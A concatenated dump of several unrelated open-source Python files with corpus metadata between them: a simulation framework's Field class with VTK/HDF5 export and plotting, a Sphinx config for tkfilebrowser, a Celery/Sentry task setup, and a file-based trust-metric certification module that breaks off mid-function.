of a component: vertexID or cellID :param tuple value: Value to be set for a given component, should have the same units as receiver .. Note:: If a mesh has mapping attached (a mesh view) then we have to remember value locally and record change. The source field values are updated after commit() method is invoked. """ self.value[componentID] = value def commit(self): """ Commits the recorded changes (via setValue method) to a primary field. """ def getObjectID(self): """ Returns field objectID. :return: Object's ID :rtype: int """ return self.objectID def getUnits(self): """ :return: Returns units of the receiver :rtype: Physics.PhysicalUnits """ return self.unit def merge(self, field): """ Merges the receiver with given field together. Both fields should be on different parts of the domain (can also overlap), but should refer to same underlying discretization, otherwise unpredictable results can occur. :param Field field: given field to merge with. """ # first merge meshes mesh = copy.deepcopy(self.mesh) mesh.merge(field.mesh) log.debug(mesh) # merge the field values # some type checking first if self.fieldType != field.fieldType: raise TypeError("Field::merge: fieldType of receiver and parameter is different") if self.fieldType == FieldType.FT_vertexBased: values = [0]*mesh.getNumberOfVertices() for v in range(self.mesh.getNumberOfVertices()): values[mesh.vertexLabel2Number(self.mesh.getVertex(v).label)] = self.value[v] for v in range(field.mesh.getNumberOfVertices()): values[mesh.vertexLabel2Number(field.mesh.getVertex(v).label)] = field.value[v] else: values = [0]*mesh.getNumberOfCells() for v in range(self.mesh.getNumberOfCells()): values[mesh.cellLabel2Number(self.mesh.giveCell(v).label)] = self.value[v] for v in range(field.mesh.getNumberOfCells()): values[mesh.cellLabel2Number(field.mesh.giveCell(v).label)] = field.value[v] self.mesh = mesh self.value = values def field2VTKData (self, name=None, lookupTable=None): """ Creates VTK representation of the receiver. Useful for visualization. Requires pyvtk module. :param str name: human-readable name of the field :param pyvtk.LookupTable lookupTable: color lookup table :return: Instance of pyvtk :rtype: pyvtk.VtkData """ import pyvtk if name is None: name = self.getFieldIDName() if lookupTable and not isinstance(lookupTable, pyvtk.LookupTable): log.info('ignoring lookupTable which is not a pyvtk.LookupTable instance.') lookupTable = None if lookupTable is None: lookupTable=pyvtk.LookupTable([(0, .231, .298, 1.0), (.4, .865, .865, 1.0), (.8, .706, .016, 1.0)], name='coolwarm') # Scalars use different name than 'coolwarm'. Then Paraview uses its own color mapping instead of taking # 'coolwarm' from *.vtk file. This prevents setting Paraview's color mapping. scalarsKw = dict(name=name, lookup_table='default') else: scalarsKw = dict(name=name, lookup_table=lookupTable.name) # see http://cens.ioc.ee/cgi-bin/cvsweb/python/pyvtk/examples/example1.py?rev=1.3 for an example vectorsKw = dict(name=name) # vectors don't have a lookup_table if self.fieldType == FieldType.FT_vertexBased: if self.getValueType() == ValueType.Scalar: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Scalars([val[0] for val in self.value], **scalarsKw), lookupTable), 'Unstructured Grid Example') elif self.getValueType() == ValueType.Vector: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Vectors(self.value, **vectorsKw), lookupTable), 'Unstructured Grid Example') elif self.getValueType() == ValueType.Tensor: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Tensors(self.getMartixForTensor(self.value), **vectorsKw), lookupTable), 'Unstructured Grid Example') else: if self.getValueType() == ValueType.Scalar: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Scalars([val[0] for val in self.value], **scalarsKw), lookupTable), 'Unstructured Grid Example') elif self.getValueType() == ValueType.Vector: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Vectors(self.value, **vectorsKw),lookupTable), 'Unstructured Grid Example') elif self.getValueType() == ValueType.Tensor: return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Tensors(self.getMartixForTensor(self.value), **vectorsKw), lookupTable), 'Unstructured Grid Example') def getMartixForTensor(self, values): """ Reshape values to a list with 3x3 arrays. Usable for VTK export. :param list values: List containing tuples of 9 values, e.g. [(1,2,3,4,5,6,7,8,9), (1,2,3,4,5,6,7,8,9), ...] :return: List containing 3x3 matrices for each tensor :rtype: list """ tensor = [] for i in values: tensor.append(numpy.reshape(i, (3, 3))) return tensor def dumpToLocalFile(self, fileName, protocol=pickle.HIGHEST_PROTOCOL): """ Dump Field to a file using a Pickle serialization module. :param str fileName: File name :param int protocol: Used protocol - 0=ASCII, 1=old binary, 2=new binary """ pickle.dump(self, open(fileName, 'wb'), protocol) def field2Image2D(self, plane='xy', elevation=(-1.e-6, 1.e-6), numX=10, numY=20, interp='linear', fieldComponent=0, vertex=True, colorBar='horizontal', colorBarLegend='', barRange=(None, None), barFormatNum='%.3g', title='', xlabel='', ylabel='', fileName='', show=True, figsize=(8, 4), matPlotFig=None): """ Plots and/or saves 2D image using a matplotlib library. Works for structured and unstructured 2D/3D fields. 2D/3D fields need to define plane. This method gives only basic viewing options, for aesthetic and more elaborated output use e.g. VTK field export with postprocessors such as ParaView or Mayavi. Idea from https://docs.scipy.org/doc/scipy/reference/tutorial/interpolate.html#id1 :param str plane: what plane to extract from field, valid values are 'xy', 'xz', 'yz' :param tuple elevation: range of third coordinate. For example, in plane='xy' is grabs z coordinates in the range :param int numX: number of divisions on x graph axis :param int numY: number of divisions on y graph axis :param str interp: interpolation type when transferring to a grid. Valid values 'linear', 'nearest' or 'cubic' :param int fieldComponent: component of the field :param bool vertex: if vertices shoud be plot as points :param str colorBar: color bar details. Valid values '' for no colorbar, 'vertical' or 'horizontal' :param str colorBarLegend: Legend for color bar. If '', current field name and units are printed. None prints nothing. :param tuple barRange: min and max bar range. If barRange=('NaN','NaN'), it is adjusted automatically :param str barFormatNum: format of color bar numbers :param str title: title :param str xlabel: x axis label :param str ylabel: y axis label :param str fileName: if nonempty, a filename is written to the disk, usually png, pdf, ps, eps and svg are supported :param bool show: if the plot should be showed :param tuple figsize: size of canvas in inches. Affects only showing a figure. Image to a file adjust one side automatically. :param obj matPlotFig: False means plot window remains in separate thread, True waits until a plot window becomes closed :return: handle to matPlotFig :rtype: matPlotFig """ try: import numpy as np import math from scipy.interpolate import griddata import matplotlib matplotlib.use('TkAgg') # Qt4Agg gives an empty, black window import matplotlib.pyplot as plt except ImportError as e: log.error('Skipping field2Image2D due to missing modules: %s' % e) return None # raise if self.fieldType != FieldType.FT_vertexBased: raise APIError.APIError('Only FieldType.FT_vertexBased is now supported') mesh = self.getMesh() numVertices = mesh.getNumberOfVertices() indX = 0 indY = 0 elev = 0 if plane == 'xy': indX = 0 indY = 1 elev = 2 elif plane == 'xz': indX = 0 indY = 2 elev = 1 elif plane == 'yz': indX = 1 indY = 2 elev = 0 # find eligible vertex points and values vertexPoints = [] vertexValue = [] for i in range(0, numVertices): coords = mesh.getVertex(i).getCoordinates() # print(coords) value = self.giveValue(i)[fieldComponent] if elevation[1] > coords[elev] > elevation[0]: vertexPoints.append((coords[indX], coords[indY])) vertexValue.append(value) if len(vertexPoints) == 0: log.info('No valid vertex points found, putting zeros on domain 1 x 1') for i in range(5): vertexPoints.append((i % 2, i/4.)) vertexValue.append(0) # for i in range (0, len(vertexPoints)): # print (vertexPoints[i], vertexValue[i]) vertexPointsArr = np.array(vertexPoints) vertexValueArr = np.array(vertexValue) xMin = vertexPointsArr[:, 0].min() xMax = vertexPointsArr[:, 0].max() yMin = vertexPointsArr[:, 1].min() yMax = vertexPointsArr[:, 1].max() # print(xMin, xMax, yMin, yMax) grid_x, grid_y = np.mgrid[xMin:xMax:complex(0, numX), yMin:yMax:complex(0, numY)] grid_z1 = griddata(vertexPointsArr, vertexValueArr, (grid_x, grid_y), interp) # print (grid_z1.T) plt.ion() # ineractive mode if matPlotFig is None: matPlotFig = plt.figure(figsize=figsize) # plt.xlim(xMin, xMax) # plt.ylim(yMin, yMax) plt.clf() plt.axis((xMin, xMax, yMin, yMax)) image = plt.imshow(grid_z1.T, extent=(xMin, xMax, yMin, yMax), origin='lower', aspect='equal') # plt.margins(tight=True) # plt.tight_layout() # plt.margins(x=-0.3, y=-0.3) if colorBar: cbar = plt.colorbar(orientation=colorBar, format=barFormatNum) if colorBarLegend is not None: if colorBarLegend == '': colorBarLegend = self.getFieldIDName() + '_' + str(fieldComponent) if self.unit is not None: colorBarLegend = colorBarLegend + ' (' + self.unit.name() + ')' cbar.set_label(colorBarLegend, rotation=0 if colorBar == 'horizontal' else 90) if title: plt.title(title) if xlabel: plt.xlabel(xlabel) if ylabel: plt.ylabel(ylabel) if vertex == 1: plt.scatter(vertexPointsArr[:, 0], vertexPointsArr[:, 1], marker='o', c='b', s=5, zorder=10) # plt.axis('equal') # plt.gca().set_aspect('equal', adjustable='box-forced') if isinstance(barRange[0], float) or isinstance(barRange[0], int): image.set_clim(vmin=barRange[0], vmax=barRange[1]) if fileName: plt.savefig(fileName, bbox_inches='tight') if show: matPlotFig.canvas.draw() # plt.ioff() # plt.show(block=True) return matPlotFig def field2Image2DBlock(self): """ Block an open window from matPlotLib. Waits until closed. """ import matplotlib.pyplot as plt plt.ioff() plt.show(block=True) def toHdf5(self, fileName, group='component1/part1'): """ Dump field to HDF5, in a simple format suitable for interoperability (TODO: document). :param str fileName: HDF5 file :param str group: HDF5 group the data will be saved under. The HDF hierarchy is like this:: group | +--- mesh_01 {hash=25aa0aa04457} | +--- [vertex_coords] | +--- [cell_types] | \--- [cell_vertices] +--- mesh_02 {hash=17809e2b86ea} | +--- [vertex_coords] | +--- [cell_types] | \--- [cell_vertices] +--- ... +--- field_01 | +--- -> mesh_01 | \--- [vertex_values] +--- field_02 | +--- -> mesh_01 | \--- [vertex_values] +--- field_03 | +--- -> mesh_02 | \--- [cell_values] \--- ... where ``plain`` names are HDF (sub)groups, ``[bracketed]`` names are datasets, ``{name=value}`` are HDF attributes, ``->`` prefix indicated HDF5 hardlink (transparent to the user); numerical suffixes (``_01``, ...) are auto-allocated. Mesh objects are hardlinked using HDF5 hardlinks if an identical mesh is already stored in the group, based on hexdigest of its full data. .. note:: This method has not been tested yet. The format is subject to future changes. """ import h5py hdf = h5py.File(fileName, 'a', libver='latest') if group not in hdf: gg = hdf.create_group(group) else: gg = hdf[group] # raise IOError('Path "%s" is already used in "%s".'%(path,fileName)) def lowestUnused(trsf, predicate, start=1): """ Find the lowest unused index, where *predicate* is used to test for existence, and *trsf* transforms integer (starting at *start* and incremented until unused value is found) to whatever predicate accepts as argument. Lowest transformed value is returned. """ import itertools for i in itertools.count(start=start): t = trsf(i) if not predicate(t): return t # save mesh (not saved if there already) newgrp = lowestUnused(trsf=lambda i: 'mesh_%02d' % i, predicate=lambda t: t in gg) mh5 = self.getMesh().asHdf5Object(parentgroup=gg, newgroup=newgrp) if self.value: fieldGrp = hdf.create_group(lowestUnused(trsf=lambda i, group=group: group+'/field_%02d' % i, predicate=lambda t: t in hdf)) fieldGrp['mesh'] = mh5 fieldGrp.attrs['fieldID'] = self.fieldID fieldGrp.attrs['valueType'] = self.valueType # string/bytes may not contain NULL when stored as string in HDF5 # see http://docs.h5py.org/en/2.3/strings.html # that's why we cast to opaque type "void" and uncast using tostring before unpickling fieldGrp.attrs['units'] = numpy.void(pickle.dumps(self.unit)) fieldGrp.attrs['time'] = numpy.void(pickle.dumps(self.time)) # fieldGrp.attrs['time']=self.time.getValue() if self.fieldType == FieldType.FT_vertexBased: val = numpy.empty(shape=(self.getMesh().getNumberOfVertices(), self.getRecordSize()), dtype=numpy.float) for vert in range(self.getMesh().getNumberOfVertices()): val[vert] = self.getVertexValue(vert).getValue() fieldGrp['vertex_values'] = val elif self.fieldType == FieldType.FT_cellBased: # raise NotImplementedError("Saving cell-based fields to HDF5 is not yet implemented.") val = numpy.empty(shape=(self.getMesh().getNumberOfCells(), self.getRecordSize()), dtype=numpy.float) for cell in range(self.getMesh().getNumberOfCells()): val[cell] = self.getCellValue(cell) fieldGrp['cell_values'] = val else: raise RuntimeError("Unknown fieldType %d." % self.fieldType) @staticmethod def makeFromHdf5(fileName, group='component1/part1'): """ Restore Fields from HDF5 file. :param str fileName: HDF5 file :param str group: HDF5 group the data will be read from (IOError is raised if the group does not exist). :return: list of new :obj:`Field` instances :rtype: [Field,Field,...] .. note:: This method has not been tested yet. """ import h5py hdf = h5py.File(fileName, 'r', libver='latest') grp = hdf[group] # load mesh and field data from HDF5 meshObjs = [obj for name, obj in grp.items() if name.startswith('mesh_')] fieldObjs = [obj for name, obj in grp.items() if name.startswith('field_')] # construct all meshes as mupif objects meshes = [Mesh.Mesh.makeFromHdf5Object(meshObj) for meshObj in meshObjs] # construct all fields as mupif objects ret = [] for f in fieldObjs: if 'vertex_values' in f: fieldType, values = FieldType.FT_vertexBased, f['vertex_values'] elif 'cell_values' in f: fieldType, values = FieldType.FT_cellBased, f['cell_values'] else: ValueError("HDF5/mupif format error: unable to determine field type.") fieldID, valueType, units, time = FieldID(f.attrs['fieldID']), f.attrs['valueType'], f.attrs['units'].tostring(), f.attrs['time'].tostring() if units == '': units = None # special case, handled at saving time else: units = pickle.loads(units) if time == '': time = None # special case, handled at saving time else: time = pickle.loads(time) meshIndex = meshObjs.index(f['mesh']) # find which mesh object this field refers to ret.append(Field(mesh=meshes[meshIndex], fieldID=fieldID, units=units, time=time, valueType=valueType, values=values, fieldType=fieldType)) return ret def toVTK2(self, fileName, format='ascii'): """ Save the instance as Unstructured Grid in VTK2 format (``.vtk``). :param str fileName: where to save :param str format: one of ``ascii`` or ``binary`` """ self.field2VTKData().tofile(filename=fileName, format=format) @staticmethod def makeFromVTK2(fileName, unit, time=0, skip=['coolwarm']): """ Return fields stored in *fileName* in the VTK2 (``.vtk``) format. :param str fileName: filename to load from :param PhysicalUnit unit: physical unit of filed values :param float time: time value for created fields (time is not saved in VTK2, thus cannot be recovered) :param [string,] skip: file names to be skipped when reading the input file; the default value skips the default coolwarm colormap. :returns: one field from VTK :rtype: Field """ import pyvtk from .dataID import FieldID if not fileName.endswith('.vtk'): log.warning('Field.makeFromVTK2: fileName should end with .vtk, you may get in trouble (proceeding).') ret = [] try: data = pyvtk.VtkData(fileName) # this is where reading the file happens (inside pyvtk) except NotImplementedError: log.info('pyvtk fails to open (binary?) file "%s", trying through vtk.vtkGenericDataReader.' % fileName) return Field.makeFromVTK3(fileName, time=time, units=unit, forceVersion2=True) ugr = data.structure if not isinstance(ugr, pyvtk.UnstructuredGrid): raise NotImplementedError( "grid type %s is not handled by mupif (only UnstructuredGrid is)." % ugr.__class__.__name__) mesh = Mesh.UnstructuredMesh.makeFromPyvtkUnstructuredGrid(ugr) # get cell and point data pd, cd = data.point_data.data, data.cell_data.data for dd, fieldType in (pd, FieldType.FT_vertexBased), (cd, FieldType.FT_cellBased): for d in dd: # will raise KeyError if fieldID with that name is not defined if d.name in skip: continue fid = FieldID[d.name] # determine the number of components using the expected number of values from the mesh expectedNumVal = (mesh.getNumberOfVertices() if fieldType == FieldType.FT_vertexBased else mesh.getNumberOfCells()) nc = len(d.scalars)//expectedNumVal valueType = ValueType.fromNumberOfComponents(nc) values = [d.scalars[i*nc:i*nc+nc] for i in range(len(d.scalars))] ret.append(Field( mesh=mesh, fieldID=fid, units=unit, # not stored at all time=time, # not stored either, set by caller valueType=valueType, values=values, fieldType=fieldType )) return ret def toVTK3(self, fileName, **kw): """ Save the instance as Unstructured Grid in VTK3 format (``.vtu``). This is a simple proxy for calling :obj:`manyToVTK3` with the instance as the only field to be saved. If multiple fields with identical mesh are to be saved in VTK3, use :obj:`manyToVTK3` directly. :param fileName: output file name :param ``**kw``: passed to :obj:`manyToVTK3` """ return self.manyToVTK3([self], fileName, **kw) @staticmethod def manyToVTK3(fields, fileName, ascii=False, compress=True): """ Save all fields passed as argument into VTK3 Unstructured Grid file (``*.vtu``). All *fields* must be defined on the same mesh object; exception will be raised if this is not the case. :param list of Field fields: :param fileName: output file name :param bool ascii: write numbers are ASCII in the XML-based VTU file (rather than base64-encoded binary in XML) :param bool compress: apply compression to the data """ import vtk if not fields: raise ValueError('At least one field must be passed.') # check if all fields are defined on the same mesh if len(set([f.mesh for f in fields])) != 1: raise RuntimeError( 'Not all fields are sharing the same Mesh object (and could not be saved to a single .vtu file') # convert mesh to VTK UnstructuredGrid mesh = fields[0].getMesh() vtkgrid = mesh.asVtkUnstructuredGrid() # add fields as arrays for f in fields: arr = vtk.vtkDoubleArray() arr.SetNumberOfComponents(f.getRecordSize()) arr.SetName(f.getFieldIDName()) assert f.getFieldType() in (FieldType.FT_vertexBased, FieldType.FT_cellBased) # other future types not handled if f.getFieldType() == FieldType.FT_vertexBased: nn = mesh.getNumberOfVertices() else: nn = mesh.getNumberOfCells() arr.SetNumberOfValues(nn) for i in range(nn): arr.SetTuple(i, f.giveValue(i)) if f.getFieldType() == FieldType.FT_vertexBased: vtkgrid.GetPointData().AddArray(arr) else: vtkgrid.GetCellData().AddArray(arr) # write the unstructured grid to file writer = vtk.vtkXMLUnstructuredGridWriter() if compress: writer.SetCompressor(vtk.vtkZLibDataCompressor()) if ascii: writer.SetDataModeToAscii() writer.SetFileName(fileName) # change between VTK5 and VTK6 if vtk.vtkVersion().GetVTKMajorVersion() == 6: writer.SetInputData(vtkgrid) else: writer.SetInputData(vtkgrid) writer.Write() # finito @staticmethod def makeFromVTK3(fileName, units, time=0, forceVersion2=False): """ Create fields from a VTK unstructured grid file (``.vtu``, format version 3, or ``.vtp`` with *forceVersion2*); the mesh is shared between fields. ``vtk.vtkXMLGenericDataObjectReader`` is used to open the file (unless *forceVersion2* is set), but it is checked that contained dataset is a ``vtk.vtkUnstructuredGrid`` and an error is raised if not. .. note:: Units are not supported when loading from VTK, all fields will have ``None`` unit assigned. :param str fileName: VTK (``*.vtu``) file :param PhysicalUnit units: units of read values :param float time: time value for created fields (time is not saved in VTK3, thus cannot be recovered) :param bool forceVersion2: if ``True``, ``vtk.vtkGenericDataObjectReader`` (for VTK version 2) will be used to open the file, isntead of ``vtk.vtkXMLGenericDataObjectReader``; this also supposes *fileName* ends with ``.vtk`` (not checked, but may cause an error). :return: list of new :obj:`Field` instances :rtype: [Field,Field,...] """ import vtk from .dataID import FieldID # rr=vtk.vtkXMLUnstructuredGridReader() if forceVersion2 or fileName.endswith('.vtk'): rr = vtk.vtkGenericDataObjectReader() else: rr = vtk.vtkXMLGenericDataObjectReader() rr.SetFileName(fileName) rr.Update() ugrid = rr.GetOutput() if not isinstance(ugrid, vtk.vtkUnstructuredGrid): raise RuntimeError("vtkDataObject read from '%s' must be a vtkUnstructuredGrid (not a %s)" % ( fileName, ugrid.__class__.__name__)) # import sys # sys.stderr.write(str((ugrid,ugrid.__class__,vtk.vtkUnstructuredGrid))) # make mesh -- implemented separately mesh = Mesh.UnstructuredMesh.makeFromVtkUnstructuredGrid(ugrid) # fields which will be returned ret = [] # get cell and point data cd, pd = ugrid.GetCellData(), ugrid.GetPointData() for data, fieldType in (pd, FieldType.FT_vertexBased), (cd, FieldType.FT_cellBased): for idata in range(data.GetNumberOfArrays()): aname, arr = pd.GetArrayName(idata), pd.GetArray(idata) nt = arr.GetNumberOfTuples() if nt == 0: raise RuntimeError("Zero values in field '%s', unable to determine value type." % aname) t0 = arr.GetTuple(0) valueType = ValueType.fromNumberOfComponents(len(arr.GetTuple(0))) # this will raise KeyError if fieldID with that name not defined fid = FieldID[aname] # get actual values as tuples values = [arr.GetTuple(t) for t in range(nt)] ret.append(Field( mesh=mesh, fieldID=fid, units=units, # not stored at all time=time, # not stored either, set by caller valueType=valueType, values=values, fieldType=fieldType )) return ret def _sum(self, other, sign1, sign2): """ Should return a new instance. As deep copy is expensive, this operation should be avoided. Better to modify the field values. """ raise TypeError('Not supported') def inUnitsOf(self, *units): """ Should return a new instance. As deep copy is expensive, this operation should be avoided. Better to use convertToUnits method performing in place conversion. """ raise TypeError('Not supported') # def __deepcopy__(self, memo): # """ Deepcopy operatin modified not to include attributes starting with underscore. # These are supposed to be the ones valid only to s specific copy of the receiver. # An example of these attributes are _PyroURI (injected by Application), # where _PyroURI contains the URI of specific object, the copy should receive # its own URI # """ # cls = self.__class__ # dpcpy = cls.__new__(cls) # # memo[id(self)] = dpcpy # for attr in dir(self): # if not attr.startswith('_'): # value = getattr(self, attr) # setattr(dpcpy, attr, copy.deepcopy(value, memo)) # return dpcpy
lgpl-3.0
7,138,186,339,437,092,000
43.094008
381
0.597896
false
4.202324
false
false
false
j4321/tkFileBrowser
docs/conf.py
1
5256
# -*- coding: utf-8 -*- # # Configuration file for the Sphinx documentation builder. # # This file does only contain a selection of the most common options. For a # full list see the documentation: # http://www.sphinx-doc.org/en/master/config # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # import os import sys sys.path.insert(0, os.path.abspath('..')) # -- Project information ----------------------------------------------------- project = 'tkfilebrowser' copyright = '2018, Juliette Monsel' author = 'Juliette Monsel' # The short X.Y version version = '' # The full version, including alpha/beta/rc tags release = '2.2.5' # -- General configuration --------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.viewcode', ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The master toctree document. master_doc = 'index' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path . exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'tango' # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Custom sidebar templates, must be a dictionary that maps document names # to template names. # # The default sidebars (for documents that don't match any pattern) are # defined by theme itself. Builtin themes are using these templates by # default: ``['localtoc.html', 'relations.html', 'sourcelink.html', # 'searchbox.html']``. # # html_sidebars = {} # -- Options for HTMLHelp output --------------------------------------------- # Output file base name for HTML help builder. htmlhelp_basename = 'tkfilebrowserdoc' # -- Options for LaTeX output ------------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'tkfilebrowser.tex', 'tkfilebrowser Documentation', 'Juliette Monsel', 'manual'), ] # -- Options for manual page output ------------------------------------------ # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'tkfilebrowser', 'tkfilebrowser Documentation', [author], 1) ] # -- Options for Texinfo output ---------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'tkfilebrowser', 'tkfilebrowser Documentation', author, 'tkfilebrowser', 'One line description of project.', 'Miscellaneous'), ] # -- Options for Epub output ------------------------------------------------- # Bibliographic Dublin Core info. epub_title = project # The unique identifier of the text. This can be a ISBN number # or the project homepage. # # epub_identifier = '' # A unique identification for the text. # # epub_uid = '' # A list of files that should not be packed into the epub file. epub_exclude_files = ['search.html']
gpl-3.0
8,686,003,906,744,522,000
29.034286
79
0.649543
false
3.975794
true
false
false
unisport/thumblr
thumblr/tasks.py
1
1681
from django.conf import settings from celery import Celery, Task from raven import Client import usecases client = Client(settings.SENTRY_DSN) celery = Celery('tasks') celery.conf.update( AWS_ACCESS_KEY_ID=settings.AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY=settings.AWS_SECRET_ACCESS_KEY, CELERY_TASK_SERIALIZER='json', CELERY_ACCEPT_CONTENT=['json'], CELERY_RESULT_SERIALIZER='json', BROKER_URL="sqs://%s:%s@" % (settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY), CELERY_RESULT_BACKEND="redis", CELERY_TIMEZONE='Europe/Copenhagen', BROKER_TRANSPORT_OPTIONS={'region': 'eu-west-1', 'polling_interval': 0.3, 'visibility_timeout': 3600, 'queue_name_prefix': 'catalog_products_'}, ) class ImagesCallbackTask(Task): """ Generic subclass for Product Image Processing tasks so in case of of failure, a notification is sent to Sentry. """ # def on_success(self, retval, task_id, args, kwargs): # pass def on_failure(self, exc, task_id, args, kwargs, einfo): # client.captureMessage('Task "%s" has failed miserably.' % task_id) client.capture('raven.events.Message', message='Task "%s" has failed miserably.' % task_id, data={}, extra={'exc': exc, 'Task ID': task_id, 'Args': args, 'Kwargs': kwargs, 'einfo': einfo } ) usecases.add_image = celery.task(usecases.add_image)
mit
-463,160,966,042,746,240
33.326531
100
0.558001
false
3.803167
false
false
false
guaka/trust-metrics
trustlet/pymmetry/file_certs.py
1
9725
#!/usr/bin/env python """ file_certs.py: File-based Trust Metric Profiles (example code) Copyright (C) 2001 Luke Kenneth Casson Leighton <lkcl@samba-tng.org> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA File-based Profiles on which certifications (also file-based) can be stored and retrieved for evaluation by Trust Metrics. ...with NO LOCKING! ...yet. unfortunately, type info of non-string profile names is lost on the [very basic] file-format. so, whilst the trust metric and net flow evaluation code couldn't care less what the type of its nodes is, the file storage does. *shrug*. who wants to be a number, anyway. WARNING: there is a lot of class-context overloading in this demonstration code, particularly DictCertifications and FileCertifications get reused rather inappropriately. ... but it will do, as a simple example. [i'll get round to doing a SQL and an XML one, later, properly]. """ from certs import DictCertifications, CertInfo from profile import Profile from string import join from os import makedirs, path # deal with having to store strings as text. *sigh* def unsafe_str(s): s = s.strip() if s[0] != "'" and s[0] != '"': # paranoia. don't want code from file evaluated! # if someone edits a file and removes the first # quote but not the second, TOUGH. s = '"""'+s+'"""' return eval(s) # yes, we _do_ want the quotes. # they get removed by unsafe_str, above, on retrieval. def safe_str(s): return repr(str(s)) class FileCertifications(DictCertifications): """ Certification file of format: certname1: user1=level1, user2=level2, ... certname2: user1=level1, user2=level2, ... """ def set_filename(self, file): self.f = file try: p, f = path.split(file) makedirs(p) except: pass def __read_dict(self): self.info = {} try: f = open(self.f,"rw") except: return for l in f.readlines(): l = l.strip() if len(l) == 0: continue [ftype, certs] = l.split(":") ftype = unsafe_str(ftype) certs = certs.split(",") for cert in certs: [fname, flevel] = cert.split("=") l = unsafe_str(flevel) fn = unsafe_str(fname) DictCertifications.add(self, ftype, fn, l) f.close() def __write_dict(self): f = open(self.f,"w") for key in DictCertifications.cert_keys(self): l = safe_str(key)+": " certs = [] dict = DictCertifications.certs_by_type(self, key) for c in dict.keys(): certs.append(safe_str(c)+"="+safe_str(dict[c])) l += join(certs, ", ") + "\n" f.write(l) f.close() def cert_keys(self): self.__read_dict() return DictCertifications.cert_keys(self) def certs_by_type(self, type): self.__read_dict() return DictCertifications.certs_by_type(self, type) def cert_type_keys(self, type, name): self.__read_dict() return DictCertifications.certs_type_keys(self, type, name) def add(self, type, name, level): self.__read_dict() DictCertifications.add(self, type, name, level) self.__write_dict() def remove(self, type, name): self.__read_dict() DictCertifications.remove(self, type, name, level) self.__write_dict() def cert_level(self, type, name): self.__read_dict() return DictCertifications.cert_level(self, type, name) class FileProfile(Profile): def __init__(self, name, CertClass): Profile.__init__(self, name, CertClass) self._certs_by_subj.set_filename("users/"+str(name)+"/certs.subj") self._certs_by_issuer.set_filename("users/"+str(name)+"/certs.issuer") # overload meaning of FileCertifications here to store user-profile. self.info = FileCertifications() self.info.set_filename("users/"+str(name)+"/profile") def set_filename(self, file): self.info.set_filename(file) def info_keys(self): return self.info.cert_keys() def infos_by_type(self, type): return self.info.certs_by_type(type) def info_type_keys(self, type, name): return self.info.certs_type_keys(type, name) def add(self, type, name, level): self.info.add(type, name, level) def remove(self, type, name): self.info.remove(type, name, level) def info_index(self, type, name): return self.info.cert_level(type, name) class FileCertInfo(CertInfo): """ This is probably some of the clumsiest code ever written. overload DictCertification - because it's been a really good, lazy weekend, to store an unordered list (seeds), an ordered list (levels) etc. yuck. please, someone shoot me or do a better job, _esp._ for example code. """ def cert_seeds(self, idxn): d = FileCertifications() d.set_filename("certs/"+str(idxn)) # clumsy usage of a dictionary as an unordered list. argh. d = d.certs_by_type("seeds") return d.keys() def cert_levels(self, idxn): d = FileCertifications() d.set_filename("certs/"+str(idxn)) dict = d.certs_by_type("levels") # clumsy usage of a dictionary into an ordered list. argh. keys = dict.keys() l = [None] * len(keys) for idx in keys: l[int(idx)] = dict[idx] return l def cert_level_default(self, idxn): d = FileCertifications() d.set_filename("certs/"+str(idxn)) [d] = d.certs_by_type("default level").keys() return d def cert_level_min(self, idxn): d = FileCertifications() d.set_filename("certs/"+str(idxn)) [d] = d.certs_by_type("min level").keys() return d def cert_tmetric_type(self, idxn): d = FileCertifications() 